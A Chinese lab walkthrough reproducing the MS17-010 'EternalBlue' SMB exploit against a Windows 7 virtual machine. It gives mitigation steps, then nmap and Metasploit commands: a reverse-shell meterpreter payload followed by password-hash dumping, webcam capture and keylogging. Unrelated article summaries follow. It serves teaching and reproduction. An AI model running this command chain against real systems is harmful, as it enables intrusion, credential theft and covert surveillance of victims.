MS17-010漏洞复现+利用

1、 漏洞简述

漏洞名称:“永恒之蓝”漏洞

漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148

漏洞类型:缓冲区溢出漏洞

漏洞影响:信息泄露

CVSS评分:9.3(High)

利用难度:Medium

基础权限:不需要

2、组件概述

SMB(Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。

SMB1.0协议由于在文件共享传输过程中存在的传输效率低以及传输空间小等缺陷被人们所摒弃。为了更好的实现网络中文件的共享过程,在SMB1.0的基础上开发了新的网络文件传输协议,并将其命名为SMB2.0。

该协议在实现了文件共享传输的基本功能的基础上对文件传输的效率、文件缓存的空间以及文件并发传输等问题进行改进,使得在局域网或更高配置的网络环境下,文件传输过程的速度和效率等得到了很大的提升。

3、 漏洞影响

Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016

以上系统打开445端口都容易受到影响。

4、解决方案

• 禁用 SMBv1

• 对于客户端操作系统:

  1. 打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。

  2. 在 Windows 功能窗口中,清除SMB1.0/CIFS 文件共享支持复选框,然后单击确定关闭窗口。

  3. 重新启动系统。

• 对于服务器操作系统:

  1. 打开服务器管理器,然后单击管理菜单并选择删除角色和功能。

  2. 在功能窗口中,清除SMB1.0/CIFS 文件共享支持复选框,然后单击确定关闭窗口。

  3. 重新启动系统。

• 更新Windows系统补丁:官方文档链接 

复现环境

攻击机: kali(ip:192168.137.5)

靶机:windows 2007 (ip:192.168.137.239)

一、使用nmap扫描靶机查看目标开放端口
命令为:nmap –T3 –A –v ip
-A 选项用于使用进攻性(Aggressive)方式扫描
-T3 指定扫描过程使用的时序(Timing),总有6个级别(0-5), 级别越高,速度越快,但也容易被防火墙发现
-v 表示显示冗余(verbosity)信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态
Nmap常用扫描命令
-sT:TCP connect扫描
-sS:TCP SYN扫描
-sF/-sX/-sN:通过发送一些特殊的标志位以避开设备或软件的检测
-sP:通过发送ICMP echo请求探测主机是否存活,原理同Ping
-sU:探测目标主机开放了哪些UDP端口
-sA:TCP ACK扫描,对防火墙上未屏蔽的端口进行探测
-sV:获取对应端口上更为详细的服务版本信息
-Pn:在扫描之前,不发送ICMP echo请求测试目标是否存活
-O:启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息
-F:快速扫描模式,只扫描在nmap-services中列出的端口

扫描结果如图,可以看到目标开放了445端口,并且是win7的系统 

二、启用msf,命令为: msfconsole

三、搜索漏洞,命令为: search ms17-010

选择模块auxiliary/scanner/smb/smb_ms17_010 (或者直接选中编号:use 3——具体选中哪个编号要根据个人电脑来)

auxiliary模块来验证目标是否存在ms17-010漏洞,设置目标ip,命令:set rhosts 192.168.137.239

开始运行:run

可以看到,检测出目标可能存在ms17-010漏洞

四、重新选择Exploit 漏洞利用模块,发起攻击

search ms17-010

选择模块exploit/windows/smb/ms17_010_eternalblue

设置攻击负载               set payload windows/x64/meterpreter/reverse_tcp
设置受害者ip(win7) set rhost 192.168.137.239
设置攻击者ip(kali)   set lhost 192.168.137.5
run 开始攻击,等待一会儿,发现攻击成功
五、后渗透攻击
1.通过 meterpreter 获取屏幕快照: screenshot

可以看到成功截取win7屏幕

2. 上传文件到win7

upload 本机文件路径 你想放在目标主机的文件路径

这里我上传了一张周杰伦的图片放到win7的c盘

如果要下载文件,命令为 download 目标主机文件路径 你想放的本机文件路径

3.查看当前用户权限

查看权限,
Windows命令为:getuid
Linux命令为:whoami
可以看到目前是system用户,在 Windows中system用户是最高权限 ,比管理员组用户权限更高;在 Linux中root用户权限最高。
4. 知道权限的级别,进入shell
进入Windows命令行(CMD) 命令:shell
发现有乱码输入:chcp 65001    //用于更改当前命令行的代码页为UTF-8,需要注意的是,虽然 chcp 65001 可以解决很多编码问题,但在某些情况下,它可能不是完美的解决方案
输入ipconfig,查看目标主机ip信息
5. 获取用户和密码,命令hashdump
可以看到密码被MD5加密,可以访问下面的网站解密
md5在线解密破解,md5解密加密
我这里没有设置密码
6.开启摄像头
开启摄像头
webcam_list -->查看摄像头     
这里我用的是虚拟机win7没检测到摄像头
在win7的虚拟机里选择可移动设备,安装摄像头驱动
再次查看,成功检测到摄像头
webcam_snap -->通过摄像头拍照
这里我就不露脸啦哈哈哈
webcam_stream -->通过摄像头开启视频
这里我就不演示了
7.开启键盘监听
ps  //查看windows系统运行进程
migrate -P pid  //绑定进程的PID
explorer.exe 是Windows的程序管理器或者文件资源管理器,这里我们绑定它的PID,每个人都不一样
keyscan_start  //开始监听
keyscan_dump   //获取监听
可以看到win7的输入内容
keyscan_stop  //停止监听

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/875048.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

食家巷擀面皮:一口惊艳的传统美味

在美食的世界里,总有一些经典让人难以忘怀,食家巷擀面皮便是其中之一。食家巷擀面皮,那一张张薄而有劲道的面皮,宛如艺术品般细腻。它的外观晶莹剔透,散发着诱人的光泽,让人看一眼就忍不住想要品尝。制作擀…

Vue使用FullCalendar实现日历/周历/月历

Vue使用FullCalendar实现日历/周历/月历 需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。 效果图 日历 周历 月历 安装插件…

MySQL学习——影响选项文件处理的命令行选项

大多数支持选项文件的MySQL程序都处理以下选项。因为这些选项会影响选项文件处理,所以必须在命令行上给出,而不是在选项文件中给出。为了正常工作,这些选项中的每一个都必须在其他选项之前给出,但以下情况除外: 打印默…

力扣第二十五题——K个一组反转链表

内容介绍 给你链表的头节点 head ,每 k 个节点一组进行翻转,请你返回修改后的链表。 k 是一个正整数,它的值小于或等于链表的长度。如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。 你不能只是单纯的改变节点内…

1万6千多传统文化之古代地名大全ACCESS\EXCEL数据库

继续采集传统文化数据,之前采集过《传统文化之非物质文化大全ACCESS数据库》、《名人大全古今人物ACCESS数据库》、《传统文化之民俗文化大全ACCESS数据库》,今天的是古代地名查询: 截图下方有显示“共有记录数”,截图包含了表的所…

IP协议和路由转发

文章目录 IP协议IP报头网段划分特殊的IP私有IP和公有IP IP分片 路由 IP协议 IP协议提供了一种能力,将数据报从A主机送到B主机,TCP可以保证可靠性,所以TCP/IP协议可以将数据可靠的从A主机送到B主机。 IP报头 4位版本号(version): 指定IP协议…

Unity Shader - 2024 工具篇

目录 IDE 工具建议 IDE工具 Sublime 3 大势所趋,但是Sublime 使用插件还是相当的不习惯 代码跳转 Go to definite IDE 工具建议 () what is the best ide for coding shaderlab - #4 by DaveAstator - Unity Engine - Unity Discussions​​​​​​​I IDE工…

修复SteamUI.dll加载失败的指南,快速修复failed to load steamui.dll

在使用Steam平台进行游戏下载、安装和运行时,可能会遇到一些系统错误,比如“failed to load steamui.dll”。这个错误通常意味着Steam的用户界面库文件steamui.dll出现了问题。本文将详细介绍steamui.dll文件的相关信息以及如何修复这一问题。 一.什么是…

邮件安全篇:如何防止邮件泄密?

本文主要讨论组织内部用户违反保密规定通过邮件泄密的场景。其他场景导致邮箱泄密的问题(如账号被盗、邮件系统存在安全漏洞等)不在本文的讨论范围。本文主要从邮件系架构设计、邮件数据防泄漏系统、建立健全规章制度、安全意识培训等方面分别探讨。 1. …

Java响应式编程库Reactor的介绍和基本使用

关于响应式编程的概念和介绍可以参考: 响应式编程(Reactive Programming)是什么? Java语言中,RxJava和Reactor是实现响应式编程的两个最流行的库,因为 Spring 5 及更高版本中,Reactor 是 Spring WebFlux 的底层实现框架,用于构建响应式 Web 应用,所以相比而言,Reactor…

充电桩浪涌保护方案—保障充电设施安全稳定运行的关键

在当今新能源汽车蓬勃发展的时代,充电桩作为电动汽车的“加油站”,其重要性不言而喻。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充…

JS+H5可视化广度优先算法

源码在效果图后面 可标记 障碍 起始点 终点 点击寻路按钮后&#xff0c;表格上会自动出现一条蓝色最佳路径&#xff08;加了一格一格显示的动画&#xff09; 以下是效果图 橙色起点 绿色终点 红色障碍物 以下是寻路结果 源代码 <!DOCTYPE html> <html lang&quo…

html+css前端作业 王者荣耀官网6个页面无js

htmlcss前端作业 王者荣耀官网6个页面无js 下载地址 https://download.csdn.net/download/qq_42431718/89571150 目录1 目录2 项目视频 王者荣耀6个页面&#xff08;无js&#xff09; 页面1 页面2 页面3 页面4 页面5 页面6

Camtasia2024官方下载安装激活教程+免费永久许可证秘钥激活码

在这个数字化内容层出不穷的时代&#xff0c;视频的力量日益凸显。无论是用于教育教学、企业培训、内容创作&#xff0c;还是记录生活中的精彩瞬间&#xff0c;一款强大且易用的视频编辑软件都至关重要。今天&#xff0c;让我们一同走进 Camtasia 2024 的精彩世界&#xff0c;探…

分类模型-逻辑回归和Fisher线性判别分析★★★★

该博客为个人学习清风建模的学习笔记&#xff0c;部分课程可以在B站&#xff1a;【强烈推荐】清风&#xff1a;数学建模算法、编程和写作培训的视频课程以及Matlab等软件教学_哔哩哔哩_bilibili 目录 1理论 1.1逻辑回归模型 1.2线性概率模型 1.3线性判别分析 1.4两点分布…

github的Codespaces是什么

目录 github的Codespaces是什么 一、定义与功能 二、特点与优势 三、工作原理 四、使用场景与限制 github的Codespaces是什么 GitHub的Codespaces是一个基于云的即时开发环境,它利用容器技术为开发者提供一个完全配置好的开发环境,以便他们能够直接在浏览器或通过Visua…

轻松上手微调大语言模型——QLORA篇

轻松上手微调大语言模型——QLORA篇 前言 本篇Blog是代码实战篇&#xff0c;着重于新手如何在消费级GPU上快速跑通代码&#xff0c;打造属于自己的AI大语言模型。涉及到相关技术的具体原理我会在以后的更新中一一讲解。 在本篇中我对llama-2进行微调作为示例。 先决条件 安…

【成功率极高】消逝的光芒1联机显示加入的游戏不可用完美解决办法

今天和朋友联机玩消逝的光芒1&#xff0c;但是总是联机有问题&#xff0c;总是莫名其妙连上又退出去。而且退出去一次之后就进不来了&#xff0c;网上查了下&#xff0c;大概有三种方法&#xff0c;我全都试了下。 发现只有一种办法有用&#xff0c;那就是不连加速器。 没错&…

【你也能从零基础学会网站开发】 SQL结构化查询语言应用基础--创建表约束(table Constraints) 之 PRIMARY KEY 主键约束

&#x1f680; 个人主页 极客小俊 ✍&#x1f3fb; 作者简介&#xff1a;程序猿、设计师、技术分享 &#x1f40b; 希望大家多多支持, 我们一起学习和进步&#xff01; &#x1f3c5; 欢迎评论 ❤️点赞&#x1f4ac;评论 &#x1f4c2;收藏 &#x1f4c2;加关注 什么是SQL数据…

《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》

#“微软蓝屏”事件暴露了网络安全哪些问题&#xff1f;# 近日&#xff0c;一场由微软视窗系统软件更新所引发的全球性“微软蓝屏”事件&#xff0c;犹如一场突如其来的风暴&#xff0c;以雷霆万钧之势席卷了整个科技领域。这一事件宛如一颗投入平静湖面的巨石&#xff0c;瞬间激…